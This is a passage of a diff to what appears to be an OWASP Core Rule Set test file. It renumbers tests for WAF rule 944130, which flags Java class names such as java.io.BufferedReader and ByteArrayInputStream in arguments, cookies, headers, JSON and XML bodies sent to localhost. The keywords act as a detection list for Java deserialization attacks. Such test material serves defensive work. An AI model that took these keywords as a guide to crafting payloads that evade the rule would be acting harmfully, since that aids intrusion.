- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.BufferedReader"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-43
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.BufferedReader"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 43
 desc: "Content-Type application/json arg value includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"java.io.BufferedReader\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-44
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.io.BufferedReader\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 44
 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"java.io.BufferedReader\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-45
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"java.io.BufferedReader\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 45
 desc: "Argument test includes keyword java.io.ByteArrayInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=java.io.ByteArrayInputStream"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-46
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=java.io.ByteArrayInputStream"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 46
 desc: "Argument name includes keyword java.io.ByteArrayInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "java.io.ByteArrayInputStream=test"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-47
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "java.io.ByteArrayInputStream=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 47
 desc: "Cookie test includes keyword java.io.ByteArrayInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/x-www-form-urlencoded"
- Cookie: test=java.io.ByteArrayInputStream
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=value"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-48
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=java.io.ByteArrayInputStream
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_id: 48
 desc: "Cookie name includes keyword java.io.ByteArrayInputStream"
 stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-49 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 49 desc: "Request header test includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-50 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + 
data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 50 desc: "XML attribute value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-51 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 51 desc: "XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-52 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 52 desc: "Nested XML element value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 53 desc: "Content-Type text/plain includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 54 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 55 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"java.io.ByteArrayInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 56 desc: "Argument test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 57 desc: "Argument name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 58 desc: "Cookie test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
log_contains: "id \"944130\"" + - test_id: 59 desc: "Cookie name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ByteArrayOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ByteArrayOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 60 desc: "Request header test includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ByteArrayOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ByteArrayOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 61 desc: "XML attribute value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 62 desc: "XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 63 desc: "Nested XML element value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 64 desc: "Content-Type text/plain includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ByteArrayOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ByteArrayOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 65 desc: "Content-Type application/json arg value includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ByteArrayOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 66 desc: "Content-Type application/json arg name includes keyword java.io.ByteArrayOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - 
Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ByteArrayOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 67 desc: "Argument test includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log_contains: "id \"944130\"" + - test_id: 68 desc: "Argument 
name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 69 desc: "Cookie test includes keyword java.io.CharArrayReader" stages: - 